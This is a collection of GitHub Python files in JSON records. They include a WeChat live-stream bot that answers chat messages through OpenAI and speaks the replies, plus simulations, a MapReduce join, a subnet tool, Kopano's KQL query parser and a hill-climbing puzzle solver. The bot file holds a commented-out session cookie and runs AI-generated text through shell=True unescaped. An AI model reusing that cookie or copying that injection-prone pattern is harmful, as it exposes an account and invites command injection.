+{"seq_id":"16474083685","text":"import csv,time,sys,signal\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport asyncio\r\nimport random\r\nfrom tkinter import *\r\nimport pygame\r\nimport openai\r\nfrom gtts import gTTS\r\nimport subprocess\r\nfrom collections import deque\r\nimport asyncio\r\nimport json\r\nimport requests\r\n\r\n\r\nclass wechatlive():\r\n\r\n def __init__(self):\r\n self.barrageList = {}\r\n self.cookie_string = input(\"请输入你的cookie: \")\r\n #self.cookie_string = 'promotewebsessionid=; sessionid=BgAAzr%2F%2FPx3Y80AxrWDWBpOOVnKoe%2Bg%2BrbeazJB8ndc1Lw01DiiiAO%2Fet56H%2BJAGTt5LHg57nCKCzQT9rByYJ639Hw%3D%3D; wxuin=1728252584'\r\n def Connect(self):#连接\r\n chrome_options = webdriver.ChromeOptions()\r\n #chrome_options.add_argument(\"window-size=10,10\")\r\n #chrome_options.add_argument(\"--headless\") # 隐藏UI界面\r\n # chromedriver的绝对路径(需下载和chrome版本一致http://chromedriver.storage.googleapis.com/index.html)\r\n driver_path = r'C:\\Users\\Administrator\\Downloads\\chromedriver_win32 (1)\\chromedriver.exe'\r\n # 初始化一个driver,并且指定chromedriver的路径\r\n driver = webdriver.Chrome(executable_path=driver_path,options = chrome_options)\r\n driver.get(\"https://channels.weixin.qq.com/platform/login\")\r\n # 设置等待条件:找到登录页\r\n input_box = WebDriverWait(driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, '//*[@class=\"finder-page\"]'))\r\n )\r\n print(\"加载cookie\")\r\n for i in range(10, 0, -1):\r\n time.sleep(0.5)\r\n percent_complete = (10 - i) * 10\r\n print(f\"{percent_complete}%\")\r\n cookie_list = self.cookie_string.split(\";\")\r\n for cookie in cookie_list:\r\n cookies = []\r\n name, value = cookie.split(\"=\",maxsplit=1)\r\n cookies = ({\r\n 'name': name.lstrip(),\r\n 'value': value\r\n })\r\n cookie_dict = {\r\n 'domain': 'channels.weixin.qq.com',\r\n 'name': cookies.get('name'),\r\n 'value': cookies.get('value'),\r\n #\"expires\": cookie.get('value'),\r\n 'path': '/',\r\n 'httpOnly': False,\r\n 'HostOnly': False,\r\n 'SameSite':None,\r\n 'Secure': True}\r\n driver.add_cookie(cookie_dict)\r\n driver.get('https://channels.weixin.qq.com/platform/live/liveBuild')\r\n # 设置等待条件:找到直播页面\r\n input_box = WebDriverWait(driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, '//*[@class=\"vue-recycle-scroller__item-wrapper\"]'))\r\n )\r\n last_data_id = None\r\n last_barrage = None\r\n while True: # 无限循环,伪监听\r\n time.sleep(1) # 等待1秒加载\r\n chat_room_list = driver.find_element(By.XPATH, '//*[@class=\"vue-recycle-scroller__item-wrapper\"]')\r\n chat_msgs = chat_room_list.find_elements(By.XPATH, '//*[@class=\"vue-recycle-scroller__item-view\"]')\r\n\r\n new_chat_msgs = []\r\n \r\n if last_data_id:\r\n for chat_msg in chat_msgs:\r\n if chat_msg.find_element(By.XPATH, './/div[@data-index]').get_attribute('data-index') == last_data_id:\r\n new_chat_msgs = chat_msgs[chat_msgs.index(chat_msg) + 1:]\r\n break\r\n else:\r\n new_chat_msgs = chat_msgs\r\n \r\n for chat_msg in new_chat_msgs:\r\n try:\r\n content = {} # 初始化弹幕内容字典\r\n # 尝试是否为消息弹幕\r\n try:\r\n #content[\"username\"] = chat_msg.find_element(By.CLASS_NAME, \"message-username-desc\").text\r\n content[\"msg\"] = chat_msg.find_element(By.CLASS_NAME, \"message-content\").text\r\n except:\r\n pass\r\n last_barrage = content\r\n except:\r\n continue\r\n\r\n if new_chat_msgs: \r\n last_data_id = new_chat_msgs[-1].find_element(By.XPATH, './/div[@data-index]').get_attribute('data-index')\r\n text= last_barrage['msg']\r\n openai.api_key = \"\"\r\n url = \"https://api.openai.com/v1/engines/davinci-codex/completions\"\r\n messages = [ {\"role\": \"system\", \"content\": \"你是虚拟主播小雨酱,你会对用户的输入做出可爱的回应,并对你回复的观众施加可爱魔法,回答字数不要超过100字\"},{\"role\": \"user\", \"content\": text}]\r\n\r\n response = openai.ChatCompletion.create(model=\"gpt-3.5-turbo\", messages=messages)\r\n answer = str(response['choices'][0]['message']['content'])\r\n print(answer)\r\n #self.putvoice(answer)\r\n #def putvoice(answer):\r\n # 设置要合成的文本\r\n #生成TTS语音\r\n command = f'edge-tts --voice zh-CN-XiaoyiNeural --text \"{answer}\" --write-media output.mp3' # 将 AI 生成的文本传递给 edge-tts 命令\r\n subprocess.run(command, shell=True) # 执行命令行指令\r\n # 初始化 Pygame\r\n pygame.mixer.init()\r\n # 加载语音文件\r\n pygame.mixer.music.load(\"output.mp3\")\r\n # 播放语音\r\n pygame.mixer.music.play()\r\n # 等待语音播放结束\r\n while pygame.mixer.music.get_busy():\r\n pygame.time.Clock().tick(10)\r\n # 退出临时语音文件\r\n pygame.mixer.quit()\r\n \r\n\r\n\r\ndef QuitAndSave(signum, frame):#监听退出信号\r\n print ('catched singal: %d' % signum)\r\n sys.exit(0)\r\n\r\nif __name__ == '__main__':#执行层\r\n #信号监听\r\n signal.signal(signal.SIGTERM, QuitAndSave)\r\n signal.signal(signal.SIGINT, QuitAndSave)\r\n weobj = wechatlive()\r\n weobj.Connect()\r\n","repo_name":"smallnew666/ChatGPT-Virtual-Live","sub_path":"wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":6273,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"7"} +{"seq_id":"36981287873","text":"import random\nimport argparse\n\n\n# A class to represent items.\nclass Item:\n def __init__(self, colour):\n self._colour_ = colour\n\n def get_color(self) -> int:\n return self._colour_\n\n\n# A class to hold items.\nclass Container:\n def __init__(self, colour: int, max_items: int = 7):\n self._colour_ = colour\n self._max_item_count_ = max_items\n self._inside_ = []\n\n def add_item(self, p_item: Item) -> None:\n if self.check_item_color(p_item):\n if not self.is_full():\n self._inside_.append(p_item)\n else:\n raise Exception(\"The container is full.\")\n else:\n raise Exception(\"Given item has different colour.\")\n\n def is_full(self) -> bool:\n if len(self) >= self._max_item_count_:\n return True\n return False\n\n def get_color(self) -> int:\n return self._colour_\n\n def check_item_color(self, p_item: Item) -> bool:\n if self.get_color() == p_item.get_color():\n return True\n return False\n\n def __len__(self) -> int:\n return len(self._inside_)\n\n\n# A class to hold containers.\nclass ContainerList:\n def __init__(self):\n self._containers_ = []\n self._colour_indices_ = [-1, -1, -1]\n\n def add_item(self, p_item: Item) -> None:\n item_colour = p_item.get_color()\n container_index = self._get_container_from_colour_(item_colour)\n\n # If there is a container\n if container_index >= 0 and not (self._containers_[container_index]).is_full():\n container = self._containers_[container_index]\n container.add_item(p_item)\n return\n # Create a new container.\n new_container = Container(item_colour)\n self._add_container_(new_container)\n # Add item into that container.\n new_container.add_item(p_item)\n\n def show(self) -> str:\n print_text_header = '\\n############## ContainerList ##############\\n'\n print_text_body = ''\n print_text_footer = '###########################################\\n'\n\n # Print each container\n for container in self._containers_:\n if container.get_color() == 0:\n colour_name = 'Yellow'\n elif container.get_color() == 1:\n colour_name = 'Red'\n else:\n colour_name = 'White'\n print_text_body += f'- {colour_name} Container: {len(container)} items\\n'\n\n return print_text_header + print_text_body + print_text_footer\n\n def small_log(self) -> str:\n log_text = ''\n for container in self._containers_:\n log_text += f'{container.get_color()}({len(container)}) '\n return log_text\n\n def _add_container_(self, p_container: Container) -> None:\n prev_container_index = self._get_container_from_colour_(p_container.get_color())\n\n # If there is no previous container for that colour\n if prev_container_index > 0:\n prev_container = self._containers_[prev_container_index]\n if not prev_container.is_full():\n raise Exception(\"For the same colour, the previous container is not full yet.\")\n\n self._containers_.append(p_container)\n self._change_colour_index_(p_container.get_color(), len(self._containers_) - 1)\n\n def _get_container_from_colour_(self, p_colour: int) -> int:\n index = self._colour_indices_[p_colour]\n return index\n\n def _change_colour_index_(self, p_colour: int, p_index: int) -> None:\n self._colour_indices_[p_colour] = p_index\n\n def __len__(self):\n return len(self._containers_)\n\n\ndef init_argument_parser():\n parser = argparse.ArgumentParser(\n description=\"This script lets you to experiment the Bin Packing problem with Color constraint.\")\n parser.add_argument(\"-e\", \"--experiment\", nargs=\"+\", required=True, help=\"Provide the experiment count.\")\n parser.add_argument(\"-i\", \"--items\", nargs=\"+\", required=True, help=\"Provide the item count as number.\")\n parser.add_argument(\"-f\", \"--file\", nargs=\"+\", required=True, help=\"Provide a file name to save logs/results.\")\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n # Init the argument parser for flag system.\n args = init_argument_parser()\n\n # CONFIGURATIONS #\n EXPERIMENT_COUNT = int(args.experiment[0])\n ITEM_COUNT = int(args.items[0])\n FILENAME_TO_SAVE = args.file[0]\n array_to_store_data = []\n ##################\n\n # Start the simulation.\n print(\"Experiments are started.\")\n\n file_to_save = open(FILENAME_TO_SAVE, \"a\")\n # Do experiments.\n for test in range(EXPERIMENT_COUNT):\n # Create a container to hold items.\n container_list = ContainerList()\n item_count = 0\n for _ in range(0, ITEM_COUNT):\n item_count += 1\n random_colour = random.randint(0, 2)\n item = Item(random_colour)\n container_list.add_item(item)\n\n # Store results\n array_to_store_data.append(len(container_list))\n short_results_log = f'{item_count} in {len(container_list)}: {container_list.small_log()}\\n'\n file_to_save.write(short_results_log)\n\n file_to_save.close()\n\n print(f'Minimum container count: {min(array_to_store_data)}\\n'\n f'Maximum container count: {max(array_to_store_data)}')\n\n print(\"Experiments are finished.\")\n","repo_name":"electricalgorithm/BinPackingWithColor","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31066429939","text":"import MapReduce\nimport sys\n\n\"\"\"\nImplementation of Join Operation in the Simple Python MapReduce Framework\n\"\"\"\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\ndef mapper(record):\n # key: document identifier\n # value: document contents\n key = record[1]\n mr.emit_intermediate(key,record)\n\ndef reducer(key, list_of_values):\n # key: word\n # value: list of occurrence counts\n order_list = []\n line_list = []\n for v in list_of_values:\n if v[0]==\"order\":\n order_list=v\n else:\n line_list.append(v)\n for line in line_list:\n \tmr.emit(order_list + line)\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","repo_name":"smukh93/Data_Manipulation_At_Scale","sub_path":"Assignment_3/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3343292536","text":"from ipaddress import IPv4Address,summarize_address_range\nimport argparse\n\ndef parse_args():\n #setting up argparser\n parser = argparse.ArgumentParser(description='subnetting tool')\n parser.add_argument('--start',required=True, help='enter ipv4 ip address')\n parser.add_argument('--end',required=True, help='enter ipv4 network')\n args = parser.parse_args()\n return args\n\ndef generate_subnets(start,end):\n return [ipaddr for ipaddr in summarize_address_range(IPv4Address(start),IPv4Address(end))]\n\ndef main():\n get_args = parse_args()\n for i in generate_subnets(get_args.start,get_args.end): print('{}'.format(i))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hugoreyes83/scripts","sub_path":"available_subnets.py","file_name":"available_subnets.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15141013837","text":"import datetime\nimport re\n\nimport dateutil.parser\n\n\"\"\"This module converts Microsoft KQL (Keyword Query Language)\nqueries into MAPI restrictions, as used when for example searching\nfor specific mails or users.\n\nTo achieve this, it uses a hand-written parser, using the building\nblocks in parse.py.\n\"\"\"\n\nfrom MAPI import (\n FL_SUBSTRING, FL_IGNORECASE, RELOP_GT, RELOP_EQ, PT_BOOLEAN, PT_UNICODE,\n BMR_EQZ, BMR_NEZ, PT_SYSTIME, RELOP_GE, RELOP_LT, RELOP_LE, RELOP_NE,\n PT_SHORT, PT_LONG, PT_LONGLONG, PT_FLOAT, PT_DOUBLE, MNID_ID, MNID_STRING,\n PT_MV_UNICODE, MAPI_TO, MAPI_CC, MAPI_BCC\n)\n\nfrom MAPI.Tags import (\n PR_SUBJECT_W, PR_BODY_W, PR_MESSAGE_DELIVERY_TIME, PR_HASATTACH,\n PR_MESSAGE_SIZE, PR_MESSAGE_FLAGS, MSGFLAG_READ, PR_SENDER_NAME_W,\n PR_DISPLAY_NAME_W, PR_SENT_REPRESENTING_NAME_W, PR_SMTP_ADDRESS_W,\n PR_MESSAGE_ATTACHMENTS, PR_ATTACH_LONG_FILENAME_W, PR_MESSAGE_RECIPIENTS,\n PR_RECIPIENT_TYPE, PR_SENDER_EMAIL_ADDRESS_W, PR_EMAIL_ADDRESS_W,\n PR_GIVEN_NAME_W, PR_COMPANY_NAME_W, PR_SURNAME_W, PR_OFFICE_LOCATION_W,\n PR_MOBILE_TELEPHONE_NUMBER_W, PR_BUSINESS_TELEPHONE_NUMBER_W,\n PR_POSTAL_CODE_W, PR_BIRTHDAY, PR_PREFERRED_BY_NAME_W,\n PR_RESPONSIBILITY, PR_USER_NAME, PR_FOLDER_CHILD_COUNT,\n PR_CONTENT_COUNT, PR_PARENT_ENTRYID, PR_CONTENT_UNREAD\n)\nfrom MAPI.Struct import (\n SOrRestriction, SAndRestriction, SNotRestriction, SContentRestriction,\n SPropValue, SPropertyRestriction, SBitMaskRestriction, SSubRestriction,\n)\n\nfrom MAPI.Defs import PROP_TYPE\n\nfrom .errors import ArgumentError\nfrom .restriction import Restriction\nfrom .defs import PSETID_Address, PS_PUBLIC_STRINGS\n# Backwards compatible import for older python-mapi versions without datetime_to_filetime available in MAPI.Time\nfrom . import utils as _utils\n\nfrom .parse import (\n ParserInput, Parser, Char, CharSet, ZeroOrMore, OneOrMore, Sequence,\n Choice, Optional, Wrapper, NoMatch\n)\n\n# TODO such grouping: 'subject:(fresh exciting)'\n# TODO Regex: avoid substr\n# TODO OneOrMore(regex) not needed?\n# TODO operator associativity/precedence (e.g. 'NOT a AND b'), check MSG\n# TODO escaping double quotes\n# TODO asterisk not implicit for phrases\n# TODO relative dates rel. to timezone (e.g. \"received:today\")\n# TODO graph does not support 'size>\"10 KB\" and such? we now roll our own\n# TODO email matching on to/cc/bcc (PR_SEARCH_KEY/PR_EMAIL_ADDRESS?)\n# TODO sender:user2@domain.com OR category:blue doesn't work, even if they\n# separately work?\n\nEMAIL1_NAME = (PSETID_Address, MNID_ID, 0x8083, PT_UNICODE) # TODO merge\nCATEGORY_NAME = (PS_PUBLIC_STRINGS, MNID_STRING, 'Keywords', PT_MV_UNICODE)\n\nRECIP_PROPS = [PR_DISPLAY_NAME_W, PR_EMAIL_ADDRESS_W, PR_SMTP_ADDRESS_W]\n\nMESSAGE_KEYWORD_PROP = {\n 'subject': PR_SUBJECT_W,\n 'body': PR_BODY_W,\n 'content': PR_BODY_W, # TODO what does content mean\n 'received': PR_MESSAGE_DELIVERY_TIME,\n 'hasAttachment': PR_HASATTACH,\n 'hasAttachments': PR_HASATTACH,\n 'size': PR_MESSAGE_SIZE,\n 'read': (PR_MESSAGE_FLAGS, MSGFLAG_READ),\n 'from': PR_SENT_REPRESENTING_NAME_W, # TODO email address\n # TODO why does 'from:user1@domain.com' work with just PR_SENDER_NAME_W!?\n 'sender': [PR_SENDER_NAME_W, PR_SENDER_EMAIL_ADDRESS_W],\n 'attachment': (PR_MESSAGE_ATTACHMENTS, PR_ATTACH_LONG_FILENAME_W),\n 'category': CATEGORY_NAME,\n 'to': (PR_MESSAGE_RECIPIENTS, RECIP_PROPS, MAPI_TO),\n 'cc': (PR_MESSAGE_RECIPIENTS, RECIP_PROPS, MAPI_CC),\n 'bcc': (PR_MESSAGE_RECIPIENTS, RECIP_PROPS, MAPI_BCC),\n 'participants': (PR_MESSAGE_RECIPIENTS, RECIP_PROPS, None),\n}\n\nCONTACT_KEYWORD_PROP = {\n 'name': PR_DISPLAY_NAME_W,\n 'email': EMAIL1_NAME,\n}\n\nUSER_KEYWORD_PROP = {\n 'name': PR_DISPLAY_NAME_W,\n 'givenName': PR_GIVEN_NAME_W,\n 'preferredName': PR_PREFERRED_BY_NAME_W,\n 'surname': PR_SURNAME_W,\n 'userPrincipalName': PR_USER_NAME,\n 'mail': PR_SMTP_ADDRESS_W,\n 'mobilePhone': PR_MOBILE_TELEPHONE_NUMBER_W,\n 'postalCode': PR_POSTAL_CODE_W,\n 'birthday': PR_BIRTHDAY,\n 'companyName': PR_COMPANY_NAME_W,\n 'officeLocation': PR_OFFICE_LOCATION_W,\n 'businessPhones': PR_BUSINESS_TELEPHONE_NUMBER_W,\n 'responsibilities': PR_RESPONSIBILITY,\n}\n\nFOLDER_KEYWORD_PROP = {\n 'displayName': PR_DISPLAY_NAME_W,\n 'childFolderCount': PR_FOLDER_CHILD_COUNT,\n 'parentFolderId': PR_PARENT_ENTRYID,\n 'totalItemCount': PR_CONTENT_COUNT,\n 'unreadItemCount': PR_CONTENT_UNREAD,\n}\n\nTYPE_KEYWORD_PROPMAP = {\n 'message': MESSAGE_KEYWORD_PROP,\n 'contact': CONTACT_KEYWORD_PROP,\n 'user': USER_KEYWORD_PROP,\n 'folder': FOLDER_KEYWORD_PROP,\n}\n\nDEFAULT_PROPTAGS = {\n 'message': [PR_SUBJECT_W, PR_BODY_W, PR_SENT_REPRESENTING_NAME_W],\n 'contact': [PR_DISPLAY_NAME_W, EMAIL1_NAME],\n 'user': [PR_DISPLAY_NAME_W, PR_SMTP_ADDRESS_W],\n 'folder': [PR_DISPLAY_NAME_W],\n}\n\nOP_RELOP = {\n '<': RELOP_LT,\n '>': RELOP_GT,\n '>=': RELOP_GE,\n '<=': RELOP_LE,\n '<>': RELOP_NE,\n}\n\n\ndef _interval_restriction(proptag, start, end):\n start = _utils.datetime_to_filetime(start)\n end = _utils.datetime_to_filetime(end)\n\n return SAndRestriction([\n SPropertyRestriction(RELOP_GE, proptag, SPropValue(proptag, start)),\n SPropertyRestriction(RELOP_LT, proptag, SPropValue(proptag, end))\n ])\n\n# AST node\nclass Term(object):\n def __init__(self, sign=None, field=None, op=None, value=None, hoepa=None):\n self.sign = sign\n self.field = field\n self.op = op\n self.value = value\n\n def restriction(self, type_, store):\n if self.field:\n # determine proptag for term, eg 'subject'\n proptag = TYPE_KEYWORD_PROPMAP[type_][self.field]\n flag = None\n subobj = None\n recipient_type = None\n\n # property in sub-object (attachments/recipient): sub-restriction\n if isinstance(proptag, tuple):\n if(proptag[0]) == PR_MESSAGE_ATTACHMENTS:\n subobj, proptag = proptag\n elif(proptag[0]) == PR_MESSAGE_RECIPIENTS:\n subobj, proptag, recipient_type = proptag\n elif len(proptag) == 2:\n proptag, flag = proptag\n\n # named property: resolve local proptag\n elif len(proptag) == 4:\n proptag = store._name_id(proptag[:3]) | proptag[3]\n\n # make restriction on proptag(s)\n if isinstance(proptag, list):\n restr = SOrRestriction([\n self.prop_restriction(proptag, flag) for proptag in proptag\n ])\n else:\n restr = self.prop_restriction(proptag, flag)\n\n # turn restriction into sub-restriction\n if subobj:\n if recipient_type is not None:\n restr = SAndRestriction([\n restr,\n SPropertyRestriction(\n RELOP_EQ,\n PR_RECIPIENT_TYPE,\n SPropValue(PR_RECIPIENT_TYPE, recipient_type)\n )\n ])\n restr = SSubRestriction(subobj, restr)\n\n else:\n defaults = [(store._name_id(proptag[:3]) | proptag[3])\n if isinstance(proptag, tuple) else proptag\n for proptag in DEFAULT_PROPTAGS[type_]]\n\n restr = SOrRestriction([\n SContentRestriction(\n FL_SUBSTRING | FL_IGNORECASE,\n p,\n SPropValue(p, self.value)\n ) for p in defaults\n ])\n\n if self.sign == '-':\n restr = SNotRestriction(restr)\n\n return restr\n\n def prop_restriction(self, proptag, flag):\n # comparison operator\n if self.op in ('<', '>', '>=', '<=', '<>'):\n if PROP_TYPE(proptag) == PT_SYSTIME:\n d = dateutil.parser.parse(self.value)\n d = _utils.datetime_to_filetime(d)\n restr = SPropertyRestriction(\n OP_RELOP[self.op],\n proptag,\n SPropValue(proptag, d)\n )\n else:\n value = self.value\n unit = ''\n if [x for x in ('KB', 'MB', 'GB') if value.endswith(x)]:\n value, unit = value[:-2], value[-2:]\n\n value = int(value)\n\n if unit == 'KB':\n value *= 1024\n elif unit == 'MB':\n value *= 1024**2\n elif unit == 'GB':\n value *= 1024**3\n\n restr = SPropertyRestriction(\n OP_RELOP[self.op],\n proptag,\n SPropValue(proptag, value)\n )\n\n # contains/equals operator\n elif self.op in (':', '='):\n if PROP_TYPE(proptag) == PT_UNICODE:\n restr = SContentRestriction(\n FL_SUBSTRING | FL_IGNORECASE,\n proptag,\n SPropValue(proptag, self.value)\n )\n\n elif flag or PROP_TYPE(proptag) == PT_BOOLEAN:\n if flag:\n restr = SBitMaskRestriction(\n BMR_NEZ if self.value in ('yes', 'true') else BMR_EQZ,\n proptag,\n flag\n )\n else:\n restr = SPropertyRestriction(\n RELOP_EQ,\n proptag,\n SPropValue(proptag, self.value in ('yes', 'true'))\n )\n\n elif PROP_TYPE(proptag) == PT_MV_UNICODE:\n proptag2 = (proptag ^ PT_MV_UNICODE) | PT_UNICODE # funky!\n restr = SContentRestriction(\n FL_SUBSTRING | FL_IGNORECASE,\n proptag,\n SPropValue(proptag2, self.value)\n )\n\n elif (PROP_TYPE(proptag) in \\\n (PT_SHORT, PT_LONG, PT_LONGLONG, PT_FLOAT, PT_DOUBLE)):\n conv = float if PROP_TYPE(proptag) in (PT_FLOAT, PT_DOUBLE) \\\n else int\n if '..' in self.value:\n val1, val2 = self.value.split('..')\n restr = SAndRestriction([\n SPropertyRestriction(\n RELOP_GE,\n proptag,\n SPropValue(proptag, conv(val1))\n ),\n SPropertyRestriction(\n RELOP_LT,\n proptag,\n SPropValue(proptag, conv(val2))\n )\n ])\n else:\n restr = SPropertyRestriction(\n RELOP_EQ,\n proptag,\n SPropValue(proptag, conv(self.value))\n )\n\n elif PROP_TYPE(proptag) == PT_SYSTIME:\n if self.value == 'today':\n d = datetime.datetime.now().date()\n d2 = d + datetime.timedelta(days=1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'yesterday':\n d2 = datetime.datetime.now().date()\n d = d2 - datetime.timedelta(days=1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'this week':\n d2 = datetime.datetime.now()\n d = d2.date() - datetime.timedelta(days=d2.weekday())\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'this month':\n d2 = datetime.datetime.now()\n d = d2.date() - datetime.timedelta(days=d2.day-1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'last month':\n now = datetime.datetime.now()\n d2 = now.date() - datetime.timedelta(days=now.day-1)\n d = (d2 - datetime.timedelta(days=1)).replace(day=1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'this year':\n d2 = datetime.datetime.now()\n d = datetime.datetime(d2.year, 1, 1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'last year':\n now = datetime.datetime.now()\n d2 = datetime.datetime(now.year, 1, 1)\n d = datetime.datetime(d2.year-1, 1, 1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif '..' in self.value:\n date1, date2 = self.value.split('..') # TODO hours etc\n d = dateutil.parser.parse(date1)\n d2 = dateutil.parser.parse(date2)\n restr = _interval_restriction(proptag, d, d2)\n\n else:\n d = dateutil.parser.parse(self.value) # TODO hours etc\n d2 = d + datetime.timedelta(days=1)\n restr = _interval_restriction(proptag, d, d2)\n\n return restr\n\nclass Operation(object):\n def __init__(self, op=None, args=None):\n self.op = op\n self.args = args\n\n def restriction(self, type_, store):\n if self.op == 'AND':\n return SAndRestriction(\n [arg.restriction(type_, store) for arg in self.args]\n )\n elif self.op == 'OR':\n return SOrRestriction(\n [arg.restriction(type_, store) for arg in self.args]\n )\n elif self.op == 'NOT':\n return SNotRestriction(\n self.args[0].restriction(type_, store)\n )\n\n# build parser\n\nclass Regex(Parser):\n def __init__(self, regex):\n self._re = re.compile(regex)\n\n def parse(self, parser_input) :\n if parser_input.remaining() == 0:\n return NoMatch()\n rest = parser_input._data[parser_input._position:] # TODO slow\n match = self._re.match(rest)\n if not match:\n return NoMatch()\n else:\n n = match.end()\n parser_input.read(n)\n parser_input.inc_position(n)\n return self.match(rest[:n])\n\ndef _build_parser():\n whitespace = CharSet(' ')\n\n alphaspace = Regex(r'[\\w \\-+*@.]+')\n alphaplus = Regex(r'[\\w\\-+:<>=@.]+')\n\n word = OneOrMore(Regex(r'[\\w+\\-\\*@\\./]'))\n word.modifier = lambda t: ''.join(t)\n\n text = OneOrMore(alphaspace)\n text.modifier = lambda t: ''.join(t)\n\n quoted = Sequence(Char('\"'), text, Char('\"'))\n quoted.modifier = lambda t: ''.join(t)[1:-1]\n\n value = Choice(word, quoted)\n\n def op(s):\n operator = Sequence(*(Char(c) for c in s))\n operator.modifier = lambda t: ''.join(t)\n return operator\n\n operator = Choice(op(':'), op('='), op('<='), op('>='), op('<>'),\n op('<'), op('>'))\n\n sign = CharSet('+-')\n\n term = Sequence(Optional(sign), Optional(Sequence(word, operator)), value)\n term.modifier = lambda t: Term(\n sign=t[0] if t[0] else None,\n field=t[1][0] if t[1] else None,\n op=t[1][1] if t[1] else None,\n value=t[2],\n hoepa=t\n )\n\n termplus = OneOrMore(alphaplus)\n termplus.modifier = lambda t: ''.join(t)\n\n term_fallback = Sequence(ZeroOrMore(whitespace), Choice(term, termplus))\n term_fallback.modifier = lambda t: \\\n (Term(value=t[1]) if not isinstance(t[1], Term) else t[1])\n\n lpar = Sequence(ZeroOrMore(whitespace), op('('))\n rpar = Sequence(ZeroOrMore(whitespace), op(')'))\n\n expr = Wrapper()\n\n bracketed = Sequence(lpar, expr, rpar)\n bracketed.modifier = lambda t: t[1]\n\n unit = Choice(bracketed, term_fallback)\n\n and_ = Sequence(ZeroOrMore(whitespace), op('AND'))\n and_.modifier = lambda t: 'AND'\n or_ = Sequence(ZeroOrMore(whitespace), op('OR'))\n or_.modifier = lambda t: 'OR'\n not_ = Sequence(ZeroOrMore(whitespace), op('NOT'))\n not_.modifier = lambda t: 'NOT'\n\n wsexpr = Sequence(ZeroOrMore(whitespace), expr)\n wsexpr.modifier = lambda t: t[1]\n\n wsexpr2 = Sequence(OneOrMore(whitespace), expr)\n wsexpr2.modifier = lambda t: t[1]\n\n andor = Sequence(unit,\n Optional(Sequence(Optional(Choice(and_, or_)),\n Choice(bracketed, wsexpr))))\n def modifier(t):\n if t[1] is None:\n return t[0]\n else:\n return Operation(op=t[1][0] or 'AND', args=[t[0], t[1][1]])\n andor.modifier = modifier\n\n nott = Sequence(not_, Choice(bracketed, wsexpr2))\n nott.modifier = lambda t: Operation(op=t[0], args=[t[1]])\n\n expr.parser = Choice(nott, andor)\n\n return expr\n\n_PARSER = _build_parser()\n\ndef _query_to_restriction(query, type_, store):\n query = str(query)\n try:\n ast = _PARSER.parse(ParserInput(query)).value\n return Restriction(ast.restriction(type_, store))\n except Exception:\n raise ArgumentError(\"could not process query\")\n","repo_name":"Kopano-dev/kopano-core","sub_path":"swig/python/kopano/kopano/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":17412,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"7"} +{"seq_id":"71734498144","text":"# Idea: build a directed graph\n# vertices = grid squares\n# edges = (v1, v2) where v1 is adjacent to v2 and height(v1) >= height(v2)-1\n# find the shortest path from S to E \n\nimport networkx as nx\nimport logging\n\n# graph: see 2021/a15_chiton.py\n\nclass HillClimbingAlgorithm:\n\n # check whether we can climb from src to target\n def can_climb(self, src, target):\n if src == 'S':\n src = 'a'\n elif target == 'E':\n target = 'z'\n return ord(src) >= ord(target) - 1\n\n # adds an edge from start to end in graph G\n def add_edge(self, lines, s_row, s_col, e_row, e_col, G):\n s_height = lines[s_row][s_col]\n e_height = lines[e_row][e_col]\n logging.debug(\"add edge: ({},{},{}) -> ({},{},{})\".format(s_row, s_col, s_height, e_row, e_col, e_height))\n G.add_edge((s_row, s_col, s_height), (e_row, e_col, e_height))\n\n def __init__(self, lines):\n # build a directed graph from the input. We use (row, col) as node identifiers\n G = nx.DiGraph()\n for row in range(0, len(lines)):\n for col in range(0, len(lines[row])):\n height = lines[row][col]\n if height == 'S':\n self.start = (row, col, height)\n elif height == 'E':\n self.end = (row, col, height)\n #print(\"{}/{} : {}\".format(row, col, height))\n # N neighbour max 1 higher? add connection to N\n if row > 0 and self.can_climb(height, lines[row-1][col]):\n self.add_edge(lines, row, col, row-1, col, G)\n #G.add_edge((row, col), (row-1, col))\n # S neighbour max 1 higher? add connection to S\n if (row < len(lines)-1) and self.can_climb(height, lines[row+1][col]):\n self.add_edge(lines, row, col, row+1, col, G)\n #G.add_edge((row, col), (row+1, col))\n # W neighbour max 1 higher? add connection to W\n if col > 0 and self.can_climb(height, lines[row][col-1]):\n self.add_edge(lines, row, col, row, col-1, G)\n # G.add_edge((row, col), (row, col-1))\n # E neighbour max 1 higher? add connection to E\n if (col < len(lines[row])-1) and self.can_climb(height, lines[row][col+1]):\n self.add_edge(lines, row, col, row, col+1, G)\n #G.add_edge((row, col), (row, col+1))\n logging.info(\"read graph: {}\".format(G))\n self.G = G\n\n\n def read_input_file(filename):\n with open(filename) as f:\n lines = [l.rstrip() for l in f.readlines()]\n return HillClimbingAlgorithm(lines)\n\n def solve_part_I(self):\n path = nx.shortest_path(self.G, self.start, self.end) \n 